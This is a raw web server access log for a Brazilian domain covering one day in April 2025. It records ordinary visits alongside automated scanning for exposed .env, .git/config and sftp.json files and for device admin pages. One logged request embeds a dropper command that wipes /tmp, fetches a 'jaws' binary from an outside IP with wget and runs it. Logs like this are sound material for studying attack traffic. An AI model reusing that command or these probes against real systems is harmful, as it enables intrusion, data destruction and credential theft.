185.218.84.178 - - [28/Apr/2025:06:03:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
104.234.115.115 - - [28/Apr/2025:06:22:01 -0300] "GET / HTTP/1.0" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:06:22:42 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
104.234.115.115 - - [28/Apr/2025:06:23:01 -0300] "GET / HTTP/1.1" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
107.170.66.219 - - [28/Apr/2025:06:32:21 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
107.170.66.219 - - [28/Apr/2025:06:32:21 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
vacivitta.com.br:80
185.218.86.4 - - [28/Apr/2025:06:49:48 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
196.251.73.101 - - [28/Apr/2025:07:06:41 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.4(0x17000428) NetType/WIFI Language/zh_CN"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:07:06:42 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [28/Apr/2025:07:08:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
170.106.180.139 - - [28/Apr/2025:07:10:05 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
154.81.156.7 - - [28/Apr/2025:07:12:24 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [28/Apr/2025:07:16:08 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.242 - - [28/Apr/2025:07:26:50 -0300] "GET / HTTP/1.0" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
104.234.115.242 - - [28/Apr/2025:07:27:35 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.242 - - [28/Apr/2025:07:28:18 -0300] "GET / HTTP/1.1" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:07:41:45 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
104.234.115.242 - - [28/Apr/2025:07:52:03 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.242 - - [28/Apr/2025:07:52:20 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
103.156.92.145 - - [28/Apr/2025:07:58:37 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
103.156.92.145 - - [28/Apr/2025:07:58:37 -0300] "POST / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
170.64.207.118 - - [28/Apr/2025:08:15:49 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
209.141.52.16 - - [28/Apr/2025:08:18:26 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
209.141.52.16 - - [28/Apr/2025:08:18:26 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
209.141.52.16 - - [28/Apr/2025:08:18:26 -0300] "HELP" 404 - "-" "-"
vacivitta.com.br:80
209.141.52.16 - - [28/Apr/2025:08:18:26 -0300] "GET /.vscode/sftp.json HTTP/1.1" 404 - "-" "l9explore/1.2.2"
vacivitta.com.br:80
209.141.52.16 - - [28/Apr/2025:08:18:27 -0300] "GET /.config/sftp.json HTTP/1.1" 404 - "-" "l9explore/1.2.2"
vacivitta.com.br:80
209.141.52.16 - - [28/Apr/2025:08:18:27 -0300] "GET /sftp.json HTTP/1.1" 404 - "-" "l9explore/1.2.2"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:08:26:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.35 - - [28/Apr/2025:08:31:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.84.178 - - [28/Apr/2025:08:36:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [28/Apr/2025:08:42:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [28/Apr/2025:08:43:29 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
185.242.226.154 - - [28/Apr/2025:08:43:31 -0300] "\x16\x03\x01\x02" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.7 - - [28/Apr/2025:08:52:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
178.158.249.33 - - [28/Apr/2025:09:18:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
vacivitta.com.br:80
35.241.157.174 - - [28/Apr/2025:09:28:42 -0300] "GET / HTTP/1.1" 200 488 "-" "python-requests/2.32.3"
vacivitta.com.br:80
164.92.129.211 - - [28/Apr/2025:09:32:33 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
164.92.129.211 - - [28/Apr/2025:09:32:33 -0300] "GET /odinhttpcall1745843553 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
164.92.129.211 - - [28/Apr/2025:09:32:33 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
164.92.129.211 - - [28/Apr/2025:09:32:33 -0300] "POST /sdk HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
164.92.129.211 - - [28/Apr/2025:09:32:33 -0300] "GET /evox/about HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
164.92.129.211 - - [28/Apr/2025:09:32:33 -0300] "GET /HNAP1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
164.92.129.211 - - [28/Apr/2025:09:32:34 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
164.92.129.211 - - [28/Apr/2025:09:32:34 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
104.248.128.147 - - [28/Apr/2025:09:32:34 -0300] "GET /solr/admin/info/system HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
46.101.125.18 - - [28/Apr/2025:09:32:34 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
138.68.93.84 - - [28/Apr/2025:09:32:34 -0300] "GET /v2/_catalog HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
157.230.20.154 - - [28/Apr/2025:09:32:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
167.172.167.86 - - [28/Apr/2025:09:32:34 -0300] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
134.122.66.248 - - [28/Apr/2025:09:32:34 -0300] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
138.68.87.25 - - [28/Apr/2025:09:32:34 -0300] "\x16\x03\x01\x01$\x01" 404 - "-" "-"
vacivitta.com.br:80
104.248.128.147 - - [28/Apr/2025:09:32:35 -0300] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
46.101.125.18 - - [28/Apr/2025:09:32:35 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:09:33:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.86.4 - - [28/Apr/2025:09:42:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
71.6.232.23 - - [28/Apr/2025:09:57:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:10:13:44 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
163.61.110.122 - - [28/Apr/2025:10:24:50 -0300] "POST /boaform/admin/formLogin HTTP/1.1" 404 - "http://162.240.168.168:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
vacivitta.com.br:80
185.170.144.192 - - [28/Apr/2025:10:33:28 -0300] "CONNECT ifconfig.co:443 HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
185.170.144.192 - - [28/Apr/2025:10:33:28 -0300] "\x16\x03\x01\x05\xa8\x01" 404 - "-" "-"
vacivitta.com.br:80
170.64.207.118 - - [28/Apr/2025:10:40:54 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
192.155.90.220 - - [28/Apr/2025:10:44:38 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:10:48:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
43.155.27.244 - - [28/Apr/2025:11:01:31 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
154.81.156.35 - - [28/Apr/2025:11:01:41 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
195.184.76.244 - - [28/Apr/2025:11:07:10 -0300] "\x16\x03\x03\x01\xa8\x01" 404 - "-" "-"
vacivitta.com.br:80
195.184.76.246 - - [28/Apr/2025:11:07:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
vacivitta.com.br:80
35.189.68.231 - - [28/Apr/2025:11:07:20 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
35.189.68.231 - - [28/Apr/2025:11:07:23 -0300] "OPTIONS / HTTP/1.0" 200 - "-" "-"
vacivitta.com.br:80
185.242.226.154 - - [28/Apr/2025:11:12:09 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
20.150.192.39 - - [28/Apr/2025:11:13:12 -0300] "GET /portal/redlion HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
51.81.215.66 - - [28/Apr/2025:11:19:09 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:11:26:36 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.84.178 - - [28/Apr/2025:11:40:22 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
159.89.107.236 - - [28/Apr/2025:11:40:28 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
159.89.107.236 - - [28/Apr/2025:11:40:28 -0300] "GET /odinhttpcall1745851228 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
159.89.107.236 - - [28/Apr/2025:11:40:28 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
159.89.107.236 - - [28/Apr/2025:11:40:28 -0300] "POST /sdk HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
159.89.107.236 - - [28/Apr/2025:11:40:28 -0300] "GET /HNAP1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
159.89.107.236 - - [28/Apr/2025:11:40:28 -0300] "GET /evox/about HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
159.89.107.236 - - [28/Apr/2025:11:40:29 -0300] "GET / HTTP/1.0" 200 488 "-" "-"
vacivitta.com.br:80
159.89.107.236 - - [28/Apr/2025:11:40:29 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
167.172.167.86 - - [28/Apr/2025:11:40:29 -0300] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
142.93.162.228 - - [28/Apr/2025:11:40:29 -0300] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
46.101.112.168 - - [28/Apr/2025:11:40:29 -0300] "GET /solr/admin/info/system HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
64.226.88.66 - - [28/Apr/2025:11:40:29 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
164.92.196.207 - - [28/Apr/2025:11:40:29 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
vacivitta.com.br:80
138.68.87.25 - - [28/Apr/2025:11:40:29 -0300] "GET /v2/_catalog HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
46.101.125.18 - - [28/Apr/2025:11:40:29 -0300] "\x16\x03\x01\x01$\x01" 404 - "-" "-"
vacivitta.com.br:80
64.226.88.66 - - [28/Apr/2025:11:40:30 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
46.101.112.168 - - [28/Apr/2025:11:40:30 -0300] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
68.183.184.197 - - [28/Apr/2025:11:40:30 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Go-http-client/1.1"
vacivitta.com.br:80
154.81.156.7 - - [28/Apr/2025:12:06:33 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:12:09:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
45.138.16.201 - - [28/Apr/2025:12:24:09 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:12:31:10 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [28/Apr/2025:12:47:07 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
185.218.86.4 - - [28/Apr/2025:12:52:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
170.64.207.118 - - [28/Apr/2025:12:56:11 -0300] "GET /.git/config HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
154.81.156.51 - - [28/Apr/2025:13:20:24 -0300] "GET http://ipv4.icanhazip.com/ HTTP/1.1" 200 488 "-" "Go-http-client/1.1"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:13:27:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
80.82.77.202 - - [28/Apr/2025:13:34:33 -0300] "GET / HTTP/1.0" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36"
vacivitta.com.br:80
43.159.143.187 - - [28/Apr/2025:13:44:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:14:05:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
67.60.149.76 - - [28/Apr/2025:14:14:48 -0300] "GET /shell?cd+/tmp;rm+-rf+*;wget+154.81.179.217/jaws;sh+/tmp/jaws HTTP/1.1" 404 - "-" "Hello, world"
vacivitta.com.br:80
20.65.153.128 - - [28/Apr/2025:14:29:19 -0300] "MGLNDD_162.240.168.168_80\n" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:14:39:22 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
167.94.146.62 - - [28/Apr/2025:14:43:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.146.62 - - [28/Apr/2025:14:43:19 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.146.62 - - [28/Apr/2025:14:43:20 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.146.62 - - [28/Apr/2025:14:43:20 -0300] "PRI * HTTP/2.0" 404 - "-" "-"
vacivitta.com.br:80
167.94.146.62 - - [28/Apr/2025:14:43:24 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
vacivitta.com.br:80
167.94.146.62 - - [28/Apr/2025:14:43:24 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
185.218.84.178 - - [28/Apr/2025:14:45:09 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
135.119.18.182 - - [28/Apr/2025:14:49:23 -0300] "GET /manager/text/list HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.20 - - [28/Apr/2025:15:07:47 -0300] "CONNECT ifconfig.co:443 HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
154.81.156.20 - - [28/Apr/2025:15:07:48 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.20 - - [28/Apr/2025:15:12:27 -0300] "-" 408 - "-" "-"
vacivitta.com.br:80
154.81.156.20 - - [28/Apr/2025:15:12:37 -0300] "-" 408 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:15:14:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
59.31.250.170 - - [28/Apr/2025:15:29:14 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
196.251.116.103 - - [28/Apr/2025:15:30:15 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
196.251.116.103 - - [28/Apr/2025:15:30:15 -0300] "GET /wp-content/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:15:43:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
103.156.92.145 - - [28/Apr/2025:15:43:41 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
103.156.92.145 - - [28/Apr/2025:15:43:42 -0300] "POST / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
175.205.63.3 - - [28/Apr/2025:16:02:10 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.35 - - [28/Apr/2025:16:07:04 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [28/Apr/2025:16:10:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:16:24:35 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
13.59.132.18 - - [28/Apr/2025:16:34:02 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
13.59.132.18 - - [28/Apr/2025:16:34:03 -0300] "SSH-2.0-Go" 404 - "-" "-"
vacivitta.com.br:80
13.59.132.18 - - [28/Apr/2025:16:34:10 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
13.59.132.18 - - [28/Apr/2025:16:35:28 -0300] "\n" 404 - "-" "-"
vacivitta.com.br:80
87.242.127.152 - - [28/Apr/2025:16:40:43 -0300] "GET /dns-query?dns=t9wBAAABAAAAAAAAB2V4YW1wbGUDY29tAAABAAE HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
93.174.93.12 - - [28/Apr/2025:17:06:44 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [28/Apr/2025:17:12:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.84.178 - - [28/Apr/2025:17:15:02 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
